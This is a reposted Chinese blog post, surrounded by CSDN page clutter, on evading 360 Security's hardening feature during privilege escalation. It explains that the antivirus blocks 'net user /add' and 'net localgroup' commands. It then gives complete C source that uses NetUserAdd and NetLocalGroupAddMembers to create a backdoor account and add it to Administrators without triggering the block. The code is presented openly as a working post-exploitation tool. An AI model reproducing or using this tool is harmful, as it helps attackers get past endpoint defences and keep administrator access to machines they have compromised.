转载 突破360防黑加固添加用户

最新推荐文章于 2016-11-13 15:41:40 发布
最新推荐文章于 2016-11-13 15:41:40 发布
阅读量95 收藏
点赞数
原文链接:http://www.cnblogs.com/xiao0/archive/2012/08/09/2630057.html
版权 
360功能多,现在大多管理员图省事喜欢安个360。360有个防黑加固功能比较坑爹,提权的时候经常会用到net user xxx xxx /add&net localgroup xxx xxx/add.360会拦截,如图:

net user 和 net1 user 都被拦截了,改名执行也拦截,想想这功能也不能这么鸡肋。当然360还会拦截其他命令,这次只对net user xxx xx /add做讨论。于是索性自己用C写一个吧,果断被360无视了,如图:

源码:
//Code by Pnig0s1992  
//Date:2012,3,17  
#include <stdio.h>  
#include <Windows.h>  
#include <lm.h>  
 
#pragma comment(lib,"Netapi32.lib")  
 
int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName);  
int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName);  
BOOL ImprovePriv(LPWSTR name);  
 
int main(INT argc,char * argv[])  
{  
    BOOL bResult = ImprovePriv(SE_MACHINE_ACCOUNT_NAME);  
    if(argc < 3)  
    {  
        printf("\nCode by Pnig0s1992");  
        printf("\nUsage:");  
        printf("\n\t%s UserName Password",argv[0]);  
        printf("\n\tRemark:Default add to Group:Administrators.");  
        return -1;  
    }  
    if(bResult)  
    {  
        printf("Successfully promote priv!");  
    }else 
    {  
        printf("Failed promote priv.");  
        return -1;  
    }  
    int Namesize=MultiByteToWideChar(CP_ACP,0,argv[1],-1,NULL,0);  
    wchar_t *wUserName =new wchar_t[Namesize+1];  
    if(!MultiByteToWideChar(CP_ACP,0,argv[1],-1,wUserName,Namesize))  
    {   
        return false;  
    }  
    int Passsize=MultiByteToWideChar(CP_ACP,0,argv[2],-1,NULL,0);  
    wchar_t *wPassword =new wchar_t[Passsize+1];  
    if(!MultiByteToWideChar(CP_ACP,0,argv[2],-1,wPassword,Passsize))  
    {   
        return false;  
    }  
    LPTSTR lpName = wUserName;  
    LPTSTR lpPassword = wPassword;  
    LPWSTR lpSevName = NULL;  
    LPWSTR lpGroupName = L"Administrators";  
    AddUser(lpName,lpPassword,lpSevName);  
    SetGroup(lpName,lpSevName,lpGroupName);  
    return 0;  
}  
 
BOOL ImprovePriv(LPWSTR name)  
{  
    HANDLE hToken;  
    if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken))  
    {  
        printf("\nGet process token failed.(%d)",GetLastError());  
        return FALSE;  
    }  
    TOKEN_PRIVILEGES tkp;  
    tkp.PrivilegeCount = 1;  
    if(!LookupPrivilegeValue(NULL,name,&tkp.Privileges[0].Luid))  
    {   
        printf("\nLookup process priv failed.(%d)",GetLastError());  
        return FALSE;  
    }  
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;  
    if(!AdjustTokenPrivileges(hToken,FALSE,&tkp,0,NULL,NULL))  
    {   
        printf("\nAjust process priv failed.(%d)",GetLastError());  
        return FALSE;  
    }  
    CloseHandle(hToken);  
    return TRUE;  
}  
 
int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName)  
{  
    USER_INFO_1 ui;  
    DWORD dwLevel = 1;  
    DWORD dwError = 0;  
    NET_API_STATUS nStatus;  
    ui.usri1_name = lpUsername;  
    ui.usri1_password = lpPassword;  
    ui.usri1_priv = USER_PRIV_USER;  
    ui.usri1_home_dir = NULL;  
    ui.usri1_comment = NULL;  
    ui.usri1_flags  = UF_SCRIPT;  
    ui.usri1_script_path  = NULL;  
    nStatus = NetUserAdd(lpServerName,dwLevel,(LPBYTE)&ui,&dwError);  
    if(nStatus == NERR_Success)  
    {  
        printf("\nAdd user:%S successfully!",lpUsername);  
    }else 
    {  
        printf("\nAdd user failed:%d.",nStatus);  
    }  
    return 0;  
}  
 
int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName)  
{  
    NET_API_STATUS nStatus;  
    LOCALGROUP_MEMBERS_INFO_3  lgui;  
    lgui.lgrmi3_domainandname = lpUsername;  
    nStatus = NetLocalGroupAddMembers(lpServerName,lpGroupName,3,(LPBYTE)&lgui,1);  
 
    if(nStatus == NERR_Success)  
    {  
        printf("\nSuccessfully set USER:%S to GROUP:%S!",lpUsername,lpGroupName);  
    }else if(nStatus == NERR_GroupNotFound)  
    {  
        printf("\nCan't find such a group:%S.",lpGroupName);  
    }else 
    {  
        printf("\nSet GROUP:%S failed.",lpGroupName);  
    }  
    return 0;  
}

转载于:https://www.cnblogs.com/xiao0/archive/2012/08/09/2630057.html

weixin_30287169
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
系统加固批处理.rar
04-29
包含关闭默认共享、关闭系统多余服务、密码策略、审核策略。包含关闭默认共享、关闭系统多余服务、密码策略、审核策略。包含关闭默认共享、关闭系统多余服务、密码策略、审核策略。
突破360防黑加固添加用户
weixin_34233421的博客
03-17 308
Pnig0s1992 p.s:360功能多,现在大多管理员图省事喜欢安个360360有个防黑加固功能比较坑爹,提权的时候经常会用到net user xxx xxx /add&net localgroup xxx xxx/add.360会拦截,如图: net user 和 net1 user 都被拦截了,改名执行也拦截,想想这功能也不能这么鸡肋。当然360还会拦...
WEB安全之网站防黑策略部署防范篇
weixin_34205826的博客
12-25 90
关键词:网络分析 DDoS*** 网络安全 脚本*** SYN*** WEB安全之网站防黑策略部署防范篇 本文涉及网站安全中的策略与思路,分别指出在网站安全中存在的问题。就问题分析如何做好网站防黑部署,转的老帖仅供学习参考! 1、FTP用户密码设置 通常网站都会有一个FTP账号连接服务器提供文件管理,往往用户不注意FTP账号和密码的安全。现在大多数网站...
360加固保的dex脱壳方法
热门推荐
Fly20141201. 的专栏
11-13 1万+
360整体加固classes.dex后的apk程序的特点,以超信1.1.4版本为例。360加固以后,会在apk的assets文件的路径下增加两个文件libjiagu.so和libjiagu_x86.so以及修改原apk的AndroidManifest.xml文件的application标签增加两个元素。 360加固脱壳需要完成两个任务,一个任务是过掉3
绕过360 添加用户
记事本
07-28 4432
//Code by Pnig0s1992 //Date:2012,3,17 #include #include #include #pragma comment(lib,"Netapi32.lib") int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR l
360安全卫士怎么给我们的系统防黑加固.docx
09-26
360安全卫士怎么给我们的系统防黑加固.docx
系统防黑加固
03-01
360防黑客检测
WordPress博客防黑基础技巧
09-28
使用WordPress独立博客的站长朋友很多,那看看该文很有必要,一些入门的防黑技巧一定需要掌握,请看下文介绍
系统加固基础知识 - 2015.12.08-chen
05-24
系统加固基础知识 - 2015.12.08-chen系统加固基础知识 - 2015.12.08-chen
Linux操作系统相关习题集
04-25
Linux操作系统相关习题集,包含常用名、Linux系统基础知识等
基于java的-30-「计算机毕业设计」基于net的湖南特产销售网站-源码.zip
04-25
提供的源码资源涵盖了Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 适合毕业设计、课程设计作业。这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。 所有源码均经过严格测试,可以直接运行,可以放心下载使用。有任何使用问题欢迎随时与博主沟通,第一时间进行解答!
JVM+Java程序运行过程内存分配图解
04-25
1、JVM 内存分配图解的 Visio 工程图。 2、直接下载使用、可自行调整和修改
IOC智慧运营中心平台整体解决方案qy.pptx
04-25
IOC智慧运营中心平台整体解决方案qy.pptx
node-v12.22.8-x86.msi
最新发布
04-25
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
【前端素材】大数据-电动车管理.zip
04-25
大数据技术指的是用于处理和分析大规模数据集的技术和工具。以下是一些常见的大数据技术和工具: Hadoop:Apache Hadoop是一个用于分布式存储和处理大规模数据的开源框架。它包括Hadoop Distributed File System(HDFS)用于数据存储和MapReduce用于数据处理。 Spark:Apache Spark是一个快速、通用的集群计算系统,提供了比MapReduce更快的数据处理能力。它支持内存计算和更多复杂的数据处理流程。 NoSQL数据库:NoSQL数据库(如MongoDB、Cassandra等)则更适用于处理这类数据。 数据仓库:数据仓库是一个用于集成和分析大规模数据的存储系统,一些知名的数据仓库包括Snowflake、Amazon Redshift等。 数据湖:数据湖是一个存储结构化和非结构化数据的存储池,用于支持数据分析和机器学习应用。 机器学习:大数据技术也广泛应用于机器学习领域,支持大规模数据的模型训练和预测分析。 流式处理:针对实时数据处理需求,流式处理技术(如Apache Kafka、Apache Flink)可以实时。
065ssm-jsp-mysql医院打卡挂号系统.zip(可运行源码+数据库文件+文档)
04-25
本系统采用了jsp技术,将所有业务模块采用以浏览器交互的模式,选择MySQL作为系统的数据库,开发工具选择My eclipse来进行系统的设计。基本实现了系统应有的主要功能模块,本系统有管理员、医生和用户,管理员:个人中心、公告信息管理、用户管理、科室信息管理、医生管理、预约时间段管理、出诊信息管理、在线预约管理、上班打卡管理、留言板管理、系统管理,用户:个人中心、在线预约管理、我的收藏管理。医生:个人中心、出诊信息管理、在线预约管理、上班打卡管理。前台首页:首页、公告信息、科室信息、出诊信息、留言反馈、我的、跳转到后台等操作。 对系统进行测试后,改善了程序逻辑和代码。同时确保系统中所有的程序都能正常运行,所有的功能都能操作,并且该系统有很好的操作体验,实现了对于系统和医院双赢。 关键词:医院挂号系统;jsp;Mysql;
【课件PPT】华为干部管理七步曲gl.pptx
04-25
【课件PPT】华为干部管理七步曲gl.pptx
基于python的-23-疫情数据可视化分析系统--LW-源码.zip
04-25
提供的源码资源涵盖了python应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 适合毕业设计、课程设计作业。这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。 所有源码均经过严格测试,可以直接运行,可以放心下载使用。有任何使用问题欢迎随时与博主沟通,第一时间进行解答!
C#,布尔可满足性问题(Boolean Satisfiability Problem)算法与源代码
04-25
C#,布尔可满足性问题(Boolean Satisfiability Problem)算法与源代码 1 布尔可满足性问题 布尔可满足性问题 布尔可满足性或简单的SAT是确定布尔公式是可满足还是不可满足的问题。 可满足:如果布尔变量可以赋值,使得公式为真,那么我们说公式是可满足的。 不可满足:如果无法指定此类值,则我们称公式不可满足。 2 合取范式(CNF)或也称为和积(POS) 为了更好地理解这一点,首先让我们看看什么是合取范式(CNF)或也称为和积(POS)。 CNF:CNF是子句的连词(AND),其中每个子句都是析取(OR)。 现在,2-SAT将SAT问题限制为仅表示为CNF的布尔公式,每个子句只有2个项(也称为2-CNF)。 示例:F=(A\u 1\vee B\u 1)\wedge(A\u 2\vee B\u 2)\wedge(A\u 3\vee B\u 3)\wedge。。。。。。。\楔块(A\u m\vee B\u m) 因此,2-可满足性问题可以表述为: 给定每个子句只有2个项的CNF,是否可以将这些值分配给变量,以使CNF为真?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值